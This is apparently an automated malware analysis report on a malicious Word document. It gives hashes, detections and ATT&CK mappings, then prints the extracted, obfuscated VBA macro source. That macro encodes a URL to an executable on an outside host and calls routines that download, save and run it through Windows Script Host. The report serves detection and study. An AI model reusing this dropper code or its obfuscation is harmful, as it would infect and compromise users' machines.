Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35f632b22528c895…

MALICIOUS

Office (OLE)

82.5 KB Created: 2016-05-12 23:30:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: c19966da8aaf3c04f728e22705276a63 SHA-1: 6f5031af92b2aad5eb25d2a6361b90342bd6a652 SHA-256: 35f632b22528c8950e4dfcad760d8438ffe40c76a96683be88692248cbb14636
164 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicates that the macro attempts to execute code upon opening the document. The 'SC_STR_WSCRIPT' heuristic further suggests the use of Windows Script Host, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6403839-0' confirms its malicious nature as a dropper.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6403839-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6403839-0
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3648 bytes
SHA-256: 538257fd2687160a9b3099946ad3324df116797621e07127b6a5db4bfb018d52
Detection
ClamAV: No threats found
Obfuscation or payload: likely
56 of 98 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "YEVWrnxjZw"
Private Function rvYdOAwcuH(ByVal aYERV As String, ByVal tqCeR As String) As String
Dim CylOKlM As Integer
Set HWNSf = SiovGt.kHJDvJ(YRFtRyuOMI, CdauetYt.nMfUcbkG, AlJtwNCb.NzbElOh("P3RAWOVCVES3VS", ".A3VW"))
rvYdOAwcuH = HWNSf(aYERV)
End Function
Private Function XQQHRivB() As String
XQQHRivB = AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 ")
End Function
Private Function YRFtRyuOMI() As String
YRFtRyuOMI = AlJtwNCb.NzbElOh("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function noPgfimLQl() As String
noPgfimLQl = "eJdybT86JRL"
End Function
Private Sub utuhmS(ByVal uKjCSio As String, ByVal qoqVV As String)
Set ttAvUNZbD = CdauetYt.yFOARrxkL
SiovGt.uLMdQEzSM OzsMX, AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 "), uKjCSio, ttAvUNZbD, False
SiovGt.QavSmHwAdE AlJtwNCb.NzbElOh("UJsJJerj-JJAjgJeJnGt", "GJj"), YBKUEtVd, 2963, AlJtwNCb.NzbElOh("Mv5ovzviluvl5av/45v.0uv 5(cvvomv5pautuiuvbvle5;5u)", "5uv"), NbJTHGCP, ttAvUNZbD
SiovGt.bgDKJRS 1177, ttAvUNZbD, bcUkOw
WKCFjIMPBW True, 6317, qoqVV, SiovGt.JvWgrglen(NbJTHGCP, tEVIdsD, ttAvUNZbD)
End Sub
Private Function tEVIdsD() As String
tEVIdsD = AlJtwNCb.NzbElOh(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub gbNWoi()
Dim HttjRmGJ As Integer
OIRUtHf = True
On Error GoTo ikwBA
zIxdob = False
utuhmS XbpIXBreKI, qpfZb
KpfAeitTid qpfZb
Exit Sub
ikwBA:
End Sub
Private Function qpfZb() As String
Dim TQUHiRmd As Integer, hIKrUpMu As Integer
qpfZb = rvYdOAwcuH(AlJtwNCb.NzbElOh("ZTEUMZsP", "9cZUsX"), "rlpEKNMdbrH3gcN") & ureCwD
End Function
Private Function HgLZFJd() As String
HgLZFJd = AlJtwNCb.NzbElOh("nTyHpaeB", "HBaqXn")
End Function
Private Function ureCwD() As String
Dim duAGGyqSxo As Integer
Dim AhCLLHJB As Integer
JJNlxuFaS = True
ureCwD = yUuhMmQyGP
End Function
Private Sub KpfAeitTid(ByVal OGiVlfDvNr As String)
SiovGt.lITquzHn "G29r6KbTng", CdauetYt.nMfUcbkG, 7188, OGiVlfDvNr, AlJtwNCb.NzbElOh("kEx2eI1c", "k31IG2")
End Sub
Private Function NbJTHGCP() As String
NbJTHGCP = "g81SabjfIw6"
End Function
Public Sub IdmgRsM()
Dim ZcKzmV As Integer
Dim ZJXOxiAU As Boolean
kZsag = 4121
gbNWoi
End Sub
Private Function NPLIiMfm() As String
NPLIiMfm = AlJtwNCb.NzbElOh("YClm/o/s0e", "0dY/m")
End Function
Private Function XbpIXBreKI() As String
Dim nTCnT As Integer
XbpIXBreKI = AlJtwNCb.NzbElOh("hBtYUtpYU:Y//YmYaYBgUaBzYinUBesYeUYmUprUeYbBeYlUlBUaU.cYoBYmB/UsBysUtYeUmUY/BcUacBhBeUY/UwoBrUUdY.eYYxUe", "YUB")
End Function
Private Sub WKCFjIMPBW(ByVal nYjlPOglL As Boolean, ByVal Qhqsj As Integer, ByVal mFQrVpW As String, ByVal InZuOq As Variant)
Dim nIDzD As Boolean
Dim OGwEZVg As Integer
Set iIHcTWxaSP = CdauetYt.QLILYAMDT
SiovGt.HQvScqTefi True, 1, iIHcTWxaSP, HgLZFJd
SiovGt.bgDKJRS 1177, iIHcTWxaSP, XQQHRivB
uRUxACPwrk = 5904
SiovGt.lITquzHn noPgfimLQl, iIHcTWxaSP, 7188, InZuOq, AlJtwNCb.NzbElOh("Wbbribtzek", "Zzlmkb")
sIbLjqP = "zGfxeChfYk2NCyH"
SiovGt.QavSmHwAdE mFQrVpW, nAsYQtvB, 2963, 2, noPgfimLQl, iIHcTWxaSP
SiovGt.bgDKJRS 1177, iIHcTWxaSP, NPLIiMfm
End Sub
Private Function OzsMX() As String
XBoKEL = False
OzsMX = AlJtwNCb.NzbElOh("G.E TB", ".BA ")
End Function
Private Function nAsYQtvB() As String
nAsYQtvB = AlJtwNCb.NzbElOh("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function yUuhMmQyGP() As String
yUuhMmQyGP = AlJtwNCb.NzbElOh("/76owfbV879w4eo1o8w027fw14Vb5V7a41o.VeoxeV", "V7wo4")
End Function
Private Function YBKUEtVd() As String
YBKUEtVd = AlJtwNCb.NzbElOh("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function bcUkOw() As String
bcUkOw = AlJtwNCb.NzbElOh("SIerIndr", "MIrG")
End Function